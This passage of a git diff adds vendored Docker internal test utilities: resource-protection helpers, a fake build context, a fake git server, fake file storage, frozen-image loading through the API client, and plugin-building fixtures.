+} + +func getExistingImages(t assert.TestingT, testEnv *Execution) []string { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + client := testEnv.APIClient() + filter := filters.NewArgs() + filter.Add("dangling", "false") + imageList, err := client.ImageList(context.Background(), types.ImageListOptions{ + All: true, + Filters: filter, + }) + assert.NilError(t, err, "failed to list images") + + var images []string + for _, image := range imageList { + images = append(images, tagsFromImageSummary(image)...) + } + return images +} + +func tagsFromImageSummary(image types.ImageSummary) []string { + var result []string + for _, tag := range image.RepoTags { + if tag != ":" { + result = append(result, tag) + } + } + for _, digest := range image.RepoDigests { + if digest != "@" { + result = append(result, digest) + } + } + return result +} + +// ProtectNetwork adds the specified network(s) to be protected in case of +// clean +func (e *Execution) ProtectNetwork(t testingT, networks ...string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + for _, network := range networks { + e.protectedElements.networks[network] = struct{}{} + } +} + +// ProtectNetworks protects existing networks from being cleaned up at the end +// of test runs +func ProtectNetworks(t testingT, testEnv *Execution) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + networks := getExistingNetworks(t, testEnv) + testEnv.ProtectNetwork(t, networks...) 
+} + +func getExistingNetworks(t assert.TestingT, testEnv *Execution) []string { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + client := testEnv.APIClient() + networkList, err := client.NetworkList(context.Background(), types.NetworkListOptions{}) + assert.NilError(t, err, "failed to list networks") + + var networks []string + for _, network := range networkList { + networks = append(networks, network.ID) + } + return networks +} + +// ProtectPlugin adds the specified plugin(s) to be protected in case of clean +func (e *Execution) ProtectPlugin(t testingT, plugins ...string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + for _, plugin := range plugins { + e.protectedElements.plugins[plugin] = struct{}{} + } +} + +// ProtectPlugins protects existing plugins from being cleaned up at the end of +// test runs +func ProtectPlugins(t testingT, testEnv *Execution) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + plugins := getExistingPlugins(t, testEnv) + testEnv.ProtectPlugin(t, plugins...) +} + +func getExistingPlugins(t assert.TestingT, testEnv *Execution) []string { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + client := testEnv.APIClient() + pluginList, err := client.PluginList(context.Background(), filters.Args{}) + // Docker EE does not allow cluster-wide plugin management. 
+ if dclient.IsErrNotImplemented(err) { + return []string{} + } + assert.NilError(t, err, "failed to list plugins") + + var plugins []string + for _, plugin := range pluginList { + plugins = append(plugins, plugin.Name) + } + return plugins +} + +// ProtectVolume adds the specified volume(s) to be protected in case of clean +func (e *Execution) ProtectVolume(t testingT, volumes ...string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + for _, volume := range volumes { + e.protectedElements.volumes[volume] = struct{}{} + } +} + +// ProtectVolumes protects existing volumes from being cleaned up at the end of +// test runs +func ProtectVolumes(t testingT, testEnv *Execution) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + volumes := getExistingVolumes(t, testEnv) + testEnv.ProtectVolume(t, volumes...) +} + +func getExistingVolumes(t assert.TestingT, testEnv *Execution) []string { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + client := testEnv.APIClient() + volumeList, err := client.VolumeList(context.Background(), filters.Args{}) + assert.NilError(t, err, "failed to list volumes") + + var volumes []string + for _, volume := range volumeList.Volumes { + volumes = append(volumes, volume.Name) + } + return volumes +} diff --git a/vendor/github.com/docker/docker/internal/test/fakecontext/context.go b/vendor/github.com/docker/docker/internal/test/fakecontext/context.go new file mode 100644 index 0000000000..8b11da207e --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/fakecontext/context.go @@ -0,0 +1,131 @@ +package fakecontext // import "github.com/docker/docker/internal/test/fakecontext" + +import ( + "bytes" + "io" + "io/ioutil" + "os" + "path/filepath" + + "github.com/docker/docker/internal/test" + "github.com/docker/docker/pkg/archive" +) + +type testingT interface { + Fatal(args ...interface{}) + Fatalf(string, ...interface{}) +} + +// New creates a fake build context +func New(t testingT, dir string, modifiers 
...func(*Fake) error) *Fake { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + fakeContext := &Fake{Dir: dir} + if dir == "" { + if err := newDir(fakeContext); err != nil { + t.Fatal(err) + } + } + + for _, modifier := range modifiers { + if err := modifier(fakeContext); err != nil { + t.Fatal(err) + } + } + + return fakeContext +} + +func newDir(fake *Fake) error { + tmp, err := ioutil.TempDir("", "fake-context") + if err != nil { + return err + } + if err := os.Chmod(tmp, 0755); err != nil { + return err + } + fake.Dir = tmp + return nil +} + +// WithFile adds the specified file (with content) in the build context +func WithFile(name, content string) func(*Fake) error { + return func(ctx *Fake) error { + return ctx.Add(name, content) + } +} + +// WithDockerfile adds the specified content as Dockerfile in the build context +func WithDockerfile(content string) func(*Fake) error { + return WithFile("Dockerfile", content) +} + +// WithFiles adds the specified files in the build context, content is a string +func WithFiles(files map[string]string) func(*Fake) error { + return func(fakeContext *Fake) error { + for file, content := range files { + if err := fakeContext.Add(file, content); err != nil { + return err + } + } + return nil + } +} + +// WithBinaryFiles adds the specified files in the build context, content is binary +func WithBinaryFiles(files map[string]*bytes.Buffer) func(*Fake) error { + return func(fakeContext *Fake) error { + for file, content := range files { + if err := fakeContext.Add(file, content.String()); err != nil { + return err + } + } + return nil + } +} + +// Fake creates directories that can be used as a build context +type Fake struct { + Dir string +} + +// Add a file at a path, creating directories where necessary +func (f *Fake) Add(file, content string) error { + return f.addFile(file, []byte(content)) +} + +func (f *Fake) addFile(file string, content []byte) error { + fp := filepath.Join(f.Dir, filepath.FromSlash(file)) + 
dirpath := filepath.Dir(fp) + if dirpath != "." { + if err := os.MkdirAll(dirpath, 0755); err != nil { + return err + } + } + return ioutil.WriteFile(fp, content, 0644) + +} + +// Delete a file at a path +func (f *Fake) Delete(file string) error { + fp := filepath.Join(f.Dir, filepath.FromSlash(file)) + return os.RemoveAll(fp) +} + +// Close deletes the context +func (f *Fake) Close() error { + return os.RemoveAll(f.Dir) +} + +// AsTarReader returns a ReadCloser with the contents of Dir as a tar archive. +func (f *Fake) AsTarReader(t testingT) io.ReadCloser { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + reader, err := archive.TarWithOptions(f.Dir, &archive.TarOptions{}) + if err != nil { + t.Fatalf("Failed to create tar from %s: %s", f.Dir, err) + } + return reader +} diff --git a/vendor/github.com/docker/docker/internal/test/fakegit/fakegit.go b/vendor/github.com/docker/docker/internal/test/fakegit/fakegit.go new file mode 100644 index 0000000000..605d1baaa8 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/fakegit/fakegit.go @@ -0,0 +1,136 @@ +package fakegit // import "github.com/docker/docker/internal/test/fakegit" + +import ( + "fmt" + "io/ioutil" + "net/http" + "net/http/httptest" + "os" + "os/exec" + "path/filepath" + + "github.com/docker/docker/internal/test" + "github.com/docker/docker/internal/test/fakecontext" + "github.com/docker/docker/internal/test/fakestorage" + "gotest.tools/assert" +) + +type testingT interface { + assert.TestingT + logT + skipT + Fatal(args ...interface{}) + Fatalf(string, ...interface{}) +} + +type logT interface { + Logf(string, ...interface{}) +} + +type skipT interface { + Skip(reason string) +} + +type gitServer interface { + URL() string + Close() error +} + +type localGitServer struct { + *httptest.Server +} + +func (r *localGitServer) Close() error { + r.Server.Close() + return nil +} + +func (r *localGitServer) URL() string { + return r.Server.URL +} + +// FakeGit is a fake git server +type 
FakeGit struct { + root string + server gitServer + RepoURL string +} + +// Close closes the server, implements Closer interface +func (g *FakeGit) Close() { + g.server.Close() + os.RemoveAll(g.root) +} + +// New create a fake git server that can be used for git related tests +func New(c testingT, name string, files map[string]string, enforceLocalServer bool) *FakeGit { + if ht, ok := c.(test.HelperT); ok { + ht.Helper() + } + ctx := fakecontext.New(c, "", fakecontext.WithFiles(files)) + defer ctx.Close() + curdir, err := os.Getwd() + if err != nil { + c.Fatal(err) + } + defer os.Chdir(curdir) + + if output, err := exec.Command("git", "init", ctx.Dir).CombinedOutput(); err != nil { + c.Fatalf("error trying to init repo: %s (%s)", err, output) + } + err = os.Chdir(ctx.Dir) + if err != nil { + c.Fatal(err) + } + if output, err := exec.Command("git", "config", "user.name", "Fake User").CombinedOutput(); err != nil { + c.Fatalf("error trying to set 'user.name': %s (%s)", err, output) + } + if output, err := exec.Command("git", "config", "user.email", "fake.user@example.com").CombinedOutput(); err != nil { + c.Fatalf("error trying to set 'user.email': %s (%s)", err, output) + } + if output, err := exec.Command("git", "add", "*").CombinedOutput(); err != nil { + c.Fatalf("error trying to add files to repo: %s (%s)", err, output) + } + if output, err := exec.Command("git", "commit", "-a", "-m", "Initial commit").CombinedOutput(); err != nil { + c.Fatalf("error trying to commit to repo: %s (%s)", err, output) + } + + root, err := ioutil.TempDir("", "docker-test-git-repo") + if err != nil { + c.Fatal(err) + } + repoPath := filepath.Join(root, name+".git") + if output, err := exec.Command("git", "clone", "--bare", ctx.Dir, repoPath).CombinedOutput(); err != nil { + os.RemoveAll(root) + c.Fatalf("error trying to clone --bare: %s (%s)", err, output) + } + err = os.Chdir(repoPath) + if err != nil { + os.RemoveAll(root) + c.Fatal(err) + } + if output, err := exec.Command("git", 
"update-server-info").CombinedOutput(); err != nil { + os.RemoveAll(root) + c.Fatalf("error trying to git update-server-info: %s (%s)", err, output) + } + err = os.Chdir(curdir) + if err != nil { + os.RemoveAll(root) + c.Fatal(err) + } + + var server gitServer + if !enforceLocalServer { + // use fakeStorage server, which might be local or remote (at test daemon) + server = fakestorage.New(c, root) + } else { + // always start a local http server on CLI test machine + httpServer := httptest.NewServer(http.FileServer(http.Dir(root))) + server = &localGitServer{httpServer} + } + return &FakeGit{ + root: root, + server: server, + RepoURL: fmt.Sprintf("%s/%s.git", server.URL(), name), + } +} diff --git a/vendor/github.com/docker/docker/internal/test/fakestorage/fixtures.go b/vendor/github.com/docker/docker/internal/test/fakestorage/fixtures.go new file mode 100644 index 0000000000..ad8f763143 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/fakestorage/fixtures.go @@ -0,0 +1,92 @@ +package fakestorage // import "github.com/docker/docker/internal/test/fakestorage" + +import ( + "context" + "io" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "sync" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/internal/test" + "github.com/docker/docker/pkg/archive" + "gotest.tools/assert" +) + +var ensureHTTPServerOnce sync.Once + +func ensureHTTPServerImage(t testingT) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + var doIt bool + ensureHTTPServerOnce.Do(func() { + doIt = true + }) + + if !doIt { + return + } + + defer testEnv.ProtectImage(t, "httpserver:latest") + + tmp, err := ioutil.TempDir("", "docker-http-server-test") + if err != nil { + t.Fatalf("could not build http server: %v", err) + } + defer os.RemoveAll(tmp) + + goos := testEnv.OSType + if goos == "" { + goos = "linux" + } + goarch := os.Getenv("DOCKER_ENGINE_GOARCH") + if goarch == "" { + goarch = "amd64" + } + + cpCmd, lookErr := exec.LookPath("cp") + if lookErr != 
nil { + t.Fatalf("could not build http server: %v", lookErr) + } + + if _, err = os.Stat("../contrib/httpserver/httpserver"); os.IsNotExist(err) { + goCmd, lookErr := exec.LookPath("go") + if lookErr != nil { + t.Fatalf("could not build http server: %v", lookErr) + } + + cmd := exec.Command(goCmd, "build", "-o", filepath.Join(tmp, "httpserver"), "github.com/docker/docker/contrib/httpserver") + cmd.Env = append(os.Environ(), []string{ + "CGO_ENABLED=0", + "GOOS=" + goos, + "GOARCH=" + goarch, + }...) + var out []byte + if out, err = cmd.CombinedOutput(); err != nil { + t.Fatalf("could not build http server: %s", string(out)) + } + } else { + if out, err := exec.Command(cpCmd, "../contrib/httpserver/httpserver", filepath.Join(tmp, "httpserver")).CombinedOutput(); err != nil { + t.Fatalf("could not copy http server: %v", string(out)) + } + } + + if out, err := exec.Command(cpCmd, "../contrib/httpserver/Dockerfile", filepath.Join(tmp, "Dockerfile")).CombinedOutput(); err != nil { + t.Fatalf("could not build http server: %v", string(out)) + } + + c := testEnv.APIClient() + reader, err := archive.TarWithOptions(tmp, &archive.TarOptions{}) + assert.NilError(t, err) + resp, err := c.ImageBuild(context.Background(), reader, types.ImageBuildOptions{ + Remove: true, + ForceRemove: true, + Tags: []string{"httpserver"}, + }) + assert.NilError(t, err) + _, err = io.Copy(ioutil.Discard, resp.Body) + assert.NilError(t, err) +} diff --git a/vendor/github.com/docker/docker/internal/test/fakestorage/storage.go b/vendor/github.com/docker/docker/internal/test/fakestorage/storage.go new file mode 100644 index 0000000000..b091cbc3f1 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/fakestorage/storage.go @@ -0,0 +1,200 @@ +package fakestorage // import "github.com/docker/docker/internal/test/fakestorage" + +import ( + "context" + "fmt" + "io" + "io/ioutil" + "net/http" + "net/http/httptest" + "net/url" + "os" + "strings" + + "github.com/docker/docker/api/types" + 
containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/client" + "github.com/docker/docker/internal/test" + "github.com/docker/docker/internal/test/environment" + "github.com/docker/docker/internal/test/fakecontext" + "github.com/docker/docker/internal/test/request" + "github.com/docker/docker/internal/testutil" + "github.com/docker/go-connections/nat" + "gotest.tools/assert" +) + +var testEnv *environment.Execution + +type testingT interface { + assert.TestingT + logT + skipT + Fatal(args ...interface{}) + Fatalf(string, ...interface{}) +} + +type logT interface { + Logf(string, ...interface{}) +} + +type skipT interface { + Skip(reason string) +} + +// Fake is a static file server. It might be running locally or remotely +// on test host. +type Fake interface { + Close() error + URL() string + CtxDir() string +} + +// SetTestEnvironment sets a static test environment +// TODO: decouple this package from environment +func SetTestEnvironment(env *environment.Execution) { + testEnv = env +} + +// New returns a static file server that will be use as build context. +func New(t testingT, dir string, modifiers ...func(*fakecontext.Fake) error) Fake { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + if testEnv == nil { + t.Fatal("fakstorage package requires SetTestEnvironment() to be called before use.") + } + ctx := fakecontext.New(t, dir, modifiers...) 
+ switch { + case testEnv.IsRemoteDaemon() && strings.HasPrefix(request.DaemonHost(), "unix:///"): + t.Skip(fmt.Sprintf("e2e run : daemon is remote but docker host points to a unix socket")) + case testEnv.IsLocalDaemon(): + return newLocalFakeStorage(ctx) + default: + return newRemoteFileServer(t, ctx, testEnv.APIClient()) + } + return nil +} + +// localFileStorage is a file storage on the running machine +type localFileStorage struct { + *fakecontext.Fake + *httptest.Server +} + +func (s *localFileStorage) URL() string { + return s.Server.URL +} + +func (s *localFileStorage) CtxDir() string { + return s.Fake.Dir +} + +func (s *localFileStorage) Close() error { + defer s.Server.Close() + return s.Fake.Close() +} + +func newLocalFakeStorage(ctx *fakecontext.Fake) *localFileStorage { + handler := http.FileServer(http.Dir(ctx.Dir)) + server := httptest.NewServer(handler) + return &localFileStorage{ + Fake: ctx, + Server: server, + } +} + +// remoteFileServer is a containerized static file server started on the remote +// testing machine to be used in URL-accepting docker build functionality. +type remoteFileServer struct { + host string // hostname/port web server is listening to on docker host e.g. 
0.0.0.0:43712 + container string + image string + client client.APIClient + ctx *fakecontext.Fake +} + +func (f *remoteFileServer) URL() string { + u := url.URL{ + Scheme: "http", + Host: f.host} + return u.String() +} + +func (f *remoteFileServer) CtxDir() string { + return f.ctx.Dir +} + +func (f *remoteFileServer) Close() error { + defer func() { + if f.ctx != nil { + f.ctx.Close() + } + if f.image != "" { + if _, err := f.client.ImageRemove(context.Background(), f.image, types.ImageRemoveOptions{ + Force: true, + }); err != nil { + fmt.Fprintf(os.Stderr, "Error closing remote file server : %v\n", err) + } + } + if err := f.client.Close(); err != nil { + fmt.Fprintf(os.Stderr, "Error closing remote file server : %v\n", err) + } + }() + if f.container == "" { + return nil + } + return f.client.ContainerRemove(context.Background(), f.container, types.ContainerRemoveOptions{ + Force: true, + RemoveVolumes: true, + }) +} + +func newRemoteFileServer(t testingT, ctx *fakecontext.Fake, c client.APIClient) *remoteFileServer { + var ( + image = fmt.Sprintf("fileserver-img-%s", strings.ToLower(testutil.GenerateRandomAlphaOnlyString(10))) + container = fmt.Sprintf("fileserver-cnt-%s", strings.ToLower(testutil.GenerateRandomAlphaOnlyString(10))) + ) + + ensureHTTPServerImage(t) + + // Build the image + if err := ctx.Add("Dockerfile", `FROM httpserver +COPY . 
/static`); err != nil { + t.Fatal(err) + } + resp, err := c.ImageBuild(context.Background(), ctx.AsTarReader(t), types.ImageBuildOptions{ + NoCache: true, + Tags: []string{image}, + }) + assert.NilError(t, err) + _, err = io.Copy(ioutil.Discard, resp.Body) + assert.NilError(t, err) + + // Start the container + b, err := c.ContainerCreate(context.Background(), &containertypes.Config{ + Image: image, + }, &containertypes.HostConfig{}, nil, container) + assert.NilError(t, err) + err = c.ContainerStart(context.Background(), b.ID, types.ContainerStartOptions{}) + assert.NilError(t, err) + + // Find out the system assigned port + i, err := c.ContainerInspect(context.Background(), b.ID) + assert.NilError(t, err) + newP, err := nat.NewPort("tcp", "80") + assert.NilError(t, err) + ports, exists := i.NetworkSettings.Ports[newP] + if !exists || len(ports) != 1 { + t.Fatalf("unable to find port 80/tcp for %s", container) + } + host := ports[0].HostIP + port := ports[0].HostPort + + return &remoteFileServer{ + container: container, + image: image, + host: fmt.Sprintf("%s:%s", host, port), + ctx: ctx, + client: c, + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/load/frozen.go b/vendor/github.com/docker/docker/internal/test/fixtures/load/frozen.go similarity index 60% rename from vendor/github.com/docker/docker/integration-cli/fixtures/load/frozen.go rename to vendor/github.com/docker/docker/internal/test/fixtures/load/frozen.go index 13cd393f36..94f3680f95 100644 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/load/frozen.go +++ b/vendor/github.com/docker/docker/internal/test/fixtures/load/frozen.go @@ -1,29 +1,33 @@ -package load +package load // import "github.com/docker/docker/internal/test/fixtures/load" import ( "bufio" "bytes" + "context" "os" "os/exec" "path/filepath" "strings" "sync" + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" + "github.com/docker/docker/pkg/jsonmessage" + 
"github.com/docker/docker/pkg/term" "github.com/pkg/errors" ) -var frozenImgDir = "/docker-frozen-images" +const frozenImgDir = "/docker-frozen-images" // FrozenImagesLinux loads the frozen image set for the integration suite // If the images are not available locally it will download them // TODO: This loads whatever is in the frozen image dir, regardless of what // images were passed in. If the images need to be downloaded, then it will respect // the passed in images -func FrozenImagesLinux(dockerBinary string, images ...string) error { - imgNS := os.Getenv("TEST_IMAGE_NAMESPACE") +func FrozenImagesLinux(client client.APIClient, images ...string) error { var loadImages []struct{ srcName, destName string } for _, img := range images { - if err := exec.Command(dockerBinary, "inspect", "--type=image", img).Run(); err != nil { + if !imageExists(client, img) { srcName := img // hello-world:latest gets re-tagged as hello-world:frozen // there are some tests that use hello-world:latest specifically so it pulls @@ -32,9 +36,6 @@ func FrozenImagesLinux(dockerBinary string, images ...string) error { if img == "hello-world:frozen" { srcName = "hello-world:latest" } - if imgNS != "" { - srcName = imgNS + "/" + srcName - } loadImages = append(loadImages, struct{ srcName, destName string }{ srcName: srcName, destName: img, @@ -46,35 +47,41 @@ func FrozenImagesLinux(dockerBinary string, images ...string) error { return nil } + ctx := context.Background() fi, err := os.Stat(frozenImgDir) if err != nil || !fi.IsDir() { srcImages := make([]string, 0, len(loadImages)) for _, img := range loadImages { srcImages = append(srcImages, img.srcName) } - if err := pullImages(dockerBinary, srcImages); err != nil { + if err := pullImages(ctx, client, srcImages); err != nil { return errors.Wrap(err, "error pulling image list") } } else { - if err := loadFrozenImages(dockerBinary); err != nil { + if err := loadFrozenImages(ctx, client); err != nil { return err } } for _, img := range 
loadImages { if img.srcName != img.destName { - if out, err := exec.Command(dockerBinary, "tag", img.srcName, img.destName).CombinedOutput(); err != nil { - return errors.Errorf("%v: %s", err, string(out)) + if err := client.ImageTag(ctx, img.srcName, img.destName); err != nil { + return errors.Wrapf(err, "failed to tag %s as %s", img.srcName, img.destName) } - if out, err := exec.Command(dockerBinary, "rmi", img.srcName).CombinedOutput(); err != nil { - return errors.Errorf("%v: %s", err, string(out)) + if _, err := client.ImageRemove(ctx, img.srcName, types.ImageRemoveOptions{}); err != nil { + return errors.Wrapf(err, "failed to remove %s", img.srcName) } } } return nil } -func loadFrozenImages(dockerBinary string) error { +func imageExists(client client.APIClient, name string) bool { + _, _, err := client.ImageInspectWithRaw(context.Background(), name) + return err == nil +} + +func loadFrozenImages(ctx context.Context, client client.APIClient) error { tar, err := exec.LookPath("tar") if err != nil { return errors.Wrap(err, "could not find tar binary") @@ -90,15 +97,16 @@ func loadFrozenImages(dockerBinary string) error { tarCmd.Start() defer tarCmd.Wait() - cmd := exec.Command(dockerBinary, "load") - cmd.Stdin = out - if out, err := cmd.CombinedOutput(); err != nil { - return errors.Errorf("%v: %s", err, string(out)) + resp, err := client.ImageLoad(ctx, out, true) + if err != nil { + return errors.Wrap(err, "failed to load frozen images") } - return nil + defer resp.Body.Close() + fd, isTerminal := term.GetFdInfo(os.Stdout) + return jsonmessage.DisplayJSONMessagesStream(resp.Body, os.Stdout, fd, isTerminal, nil) } -func pullImages(dockerBinary string, images []string) error { +func pullImages(ctx context.Context, client client.APIClient, images []string) error { cwd, err := os.Getwd() if err != nil { return errors.Wrap(err, "error getting path to dockerfile") @@ -119,16 +127,8 @@ func pullImages(dockerBinary string, images []string) error { wg.Add(1) go 
func(tag, ref string) { defer wg.Done() - if out, err := exec.Command(dockerBinary, "pull", ref).CombinedOutput(); err != nil { - chErr <- errors.Errorf("%v: %s", string(out), err) - return - } - if out, err := exec.Command(dockerBinary, "tag", ref, tag).CombinedOutput(); err != nil { - chErr <- errors.Errorf("%v: %s", string(out), err) - return - } - if out, err := exec.Command(dockerBinary, "rmi", ref).CombinedOutput(); err != nil { - chErr <- errors.Errorf("%v: %s", string(out), err) + if err := pullTagAndRemove(ctx, client, ref, tag); err != nil { + chErr <- err return } }(tag, ref) @@ -138,6 +138,25 @@ func pullImages(dockerBinary string, images []string) error { return <-chErr } +func pullTagAndRemove(ctx context.Context, client client.APIClient, ref string, tag string) error { + resp, err := client.ImagePull(ctx, ref, types.ImagePullOptions{}) + if err != nil { + return errors.Wrapf(err, "failed to pull %s", ref) + } + defer resp.Close() + fd, isTerminal := term.GetFdInfo(os.Stdout) + if err := jsonmessage.DisplayJSONMessagesStream(resp, os.Stdout, fd, isTerminal, nil); err != nil { + return err + } + + if err := client.ImageTag(ctx, ref, tag); err != nil { + return errors.Wrapf(err, "failed to tag %s as %s", ref, tag) + } + _, err = client.ImageRemove(ctx, ref, types.ImageRemoveOptions{}) + return errors.Wrapf(err, "failed to remove %s", ref) + +} + func readFrozenImageList(dockerfilePath string, images []string) (map[string]string, error) { f, err := os.Open(dockerfilePath) if err != nil { @@ -156,11 +175,6 @@ func readFrozenImageList(dockerfilePath string, images []string) (map[string]str continue } - frozenImgDir = line[2] - if line[2] == frozenImgDir { - frozenImgDir = filepath.Join(os.Getenv("DEST"), "frozen-images") - } - for scanner.Scan() { img := strings.TrimSpace(scanner.Text()) img = strings.TrimSuffix(img, "\\") diff --git a/vendor/github.com/docker/docker/internal/test/fixtures/plugin/basic/basic.go 
b/vendor/github.com/docker/docker/internal/test/fixtures/plugin/basic/basic.go new file mode 100644 index 0000000000..892272826f --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/fixtures/plugin/basic/basic.go @@ -0,0 +1,34 @@ +package main + +import ( + "fmt" + "net" + "net/http" + "os" + "path/filepath" +) + +func main() { + p, err := filepath.Abs(filepath.Join("run", "docker", "plugins")) + if err != nil { + panic(err) + } + if err := os.MkdirAll(p, 0755); err != nil { + panic(err) + } + l, err := net.Listen("unix", filepath.Join(p, "basic.sock")) + if err != nil { + panic(err) + } + + mux := http.NewServeMux() + server := http.Server{ + Addr: l.Addr().String(), + Handler: http.NewServeMux(), + } + mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1.1+json") + fmt.Println(w, `{"Implements": ["dummy"]}`) + }) + server.Serve(l) +} diff --git a/vendor/github.com/docker/docker/internal/test/fixtures/plugin/plugin.go b/vendor/github.com/docker/docker/internal/test/fixtures/plugin/plugin.go new file mode 100644 index 0000000000..523a261ad2 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/fixtures/plugin/plugin.go @@ -0,0 +1,216 @@ +package plugin // import "github.com/docker/docker/internal/test/fixtures/plugin" + +import ( + "context" + "encoding/json" + "io" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/plugin" + "github.com/docker/docker/registry" + "github.com/pkg/errors" +) + +// CreateOpt is is passed used to change the default plugin config before +// creating it +type CreateOpt func(*Config) + +// Config wraps types.PluginConfig to provide some extra state for options +// extra customizations on the plugin details, such as using a custom binary to +// create the plugin with. 
+type Config struct { + *types.PluginConfig + binPath string +} + +// WithBinary is a CreateOpt to set an custom binary to create the plugin with. +// This binary must be statically compiled. +func WithBinary(bin string) CreateOpt { + return func(cfg *Config) { + cfg.binPath = bin + } +} + +// CreateClient is the interface used for `BuildPlugin` to interact with the +// daemon. +type CreateClient interface { + PluginCreate(context.Context, io.Reader, types.PluginCreateOptions) error +} + +// Create creates a new plugin with the specified name +func Create(ctx context.Context, c CreateClient, name string, opts ...CreateOpt) error { + tmpDir, err := ioutil.TempDir("", "create-test-plugin") + if err != nil { + return err + } + defer os.RemoveAll(tmpDir) + + tar, err := makePluginBundle(tmpDir, opts...) + if err != nil { + return err + } + defer tar.Close() + + ctx, cancel := context.WithTimeout(ctx, 30*time.Second) + defer cancel() + + return c.PluginCreate(ctx, tar, types.PluginCreateOptions{RepoName: name}) +} + +// CreateInRegistry makes a plugin (locally) and pushes it to a registry. +// This does not use a dockerd instance to create or push the plugin. +// If you just want to create a plugin in some daemon, use `Create`. +// +// This can be useful when testing plugins on swarm where you don't really want +// the plugin to exist on any of the daemons (immediately) and there needs to be +// some way to distribute the plugin. +func CreateInRegistry(ctx context.Context, repo string, auth *types.AuthConfig, opts ...CreateOpt) error { + tmpDir, err := ioutil.TempDir("", "create-test-plugin-local") + if err != nil { + return err + } + defer os.RemoveAll(tmpDir) + + inPath := filepath.Join(tmpDir, "plugin") + if err := os.MkdirAll(inPath, 0755); err != nil { + return errors.Wrap(err, "error creating plugin root") + } + + tar, err := makePluginBundle(inPath, opts...) 
+ if err != nil { + return err + } + defer tar.Close() + + dummyExec := func(m *plugin.Manager) (plugin.Executor, error) { + return nil, nil + } + + regService, err := registry.NewService(registry.ServiceOptions{V2Only: true}) + if err != nil { + return err + } + + managerConfig := plugin.ManagerConfig{ + Store: plugin.NewStore(), + RegistryService: regService, + Root: filepath.Join(tmpDir, "root"), + ExecRoot: "/run/docker", // manager init fails if not set + CreateExecutor: dummyExec, + LogPluginEvent: func(id, name, action string) {}, // panics when not set + } + manager, err := plugin.NewManager(managerConfig) + if err != nil { + return errors.Wrap(err, "error creating plugin manager") + } + + ctx, cancel := context.WithTimeout(ctx, 30*time.Second) + defer cancel() + if err := manager.CreateFromContext(ctx, tar, &types.PluginCreateOptions{RepoName: repo}); err != nil { + return err + } + + if auth == nil { + auth = &types.AuthConfig{} + } + err = manager.Push(ctx, repo, nil, auth, ioutil.Discard) + return errors.Wrap(err, "error pushing plugin") +} + +func makePluginBundle(inPath string, opts ...CreateOpt) (io.ReadCloser, error) { + p := &types.PluginConfig{ + Interface: types.PluginConfigInterface{ + Socket: "basic.sock", + Types: []types.PluginInterfaceType{{Capability: "docker.dummy/1.0"}}, + }, + Entrypoint: []string{"/basic"}, + } + cfg := &Config{ + PluginConfig: p, + } + for _, o := range opts { + o(cfg) + } + if cfg.binPath == "" { + binPath, err := ensureBasicPluginBin() + if err != nil { + return nil, err + } + cfg.binPath = binPath + } + + configJSON, err := json.Marshal(p) + if err != nil { + return nil, err + } + if err := ioutil.WriteFile(filepath.Join(inPath, "config.json"), configJSON, 0644); err != nil { + return nil, err + } + if err := os.MkdirAll(filepath.Join(inPath, "rootfs", filepath.Dir(p.Entrypoint[0])), 0755); err != nil { + return nil, errors.Wrap(err, "error creating plugin rootfs dir") + } + + // Ensure the mount target paths exist 
+ for _, m := range p.Mounts { + var stat os.FileInfo + if m.Source != nil { + stat, err = os.Stat(*m.Source) + if err != nil && !os.IsNotExist(err) { + return nil, err + } + } + + if stat == nil || stat.IsDir() { + var mode os.FileMode = 0755 + if stat != nil { + mode = stat.Mode() + } + if err := os.MkdirAll(filepath.Join(inPath, "rootfs", m.Destination), mode); err != nil { + return nil, errors.Wrap(err, "error preparing plugin mount destination path") + } + } else { + if err := os.MkdirAll(filepath.Join(inPath, "rootfs", filepath.Dir(m.Destination)), 0755); err != nil { + return nil, errors.Wrap(err, "error preparing plugin mount destination dir") + } + f, err := os.Create(filepath.Join(inPath, "rootfs", m.Destination)) + if err != nil && !os.IsExist(err) { + return nil, errors.Wrap(err, "error preparing plugin mount destination file") + } + if f != nil { + f.Close() + } + } + } + if err := archive.NewDefaultArchiver().CopyFileWithTar(cfg.binPath, filepath.Join(inPath, "rootfs", p.Entrypoint[0])); err != nil { + return nil, errors.Wrap(err, "error copying plugin binary to rootfs path") + } + tar, err := archive.Tar(inPath, archive.Uncompressed) + return tar, errors.Wrap(err, "error making plugin archive") +} + +func ensureBasicPluginBin() (string, error) { + name := "docker-basic-plugin" + p, err := exec.LookPath(name) + if err == nil { + return p, nil + } + + goBin, err := exec.LookPath("go") + if err != nil { + return "", err + } + installPath := filepath.Join(os.Getenv("GOPATH"), "bin", name) + sourcePath := filepath.Join("github.com", "docker", "docker", "internal", "test", "fixtures", "plugin", "basic") + cmd := exec.Command(goBin, "build", "-o", installPath, sourcePath) + 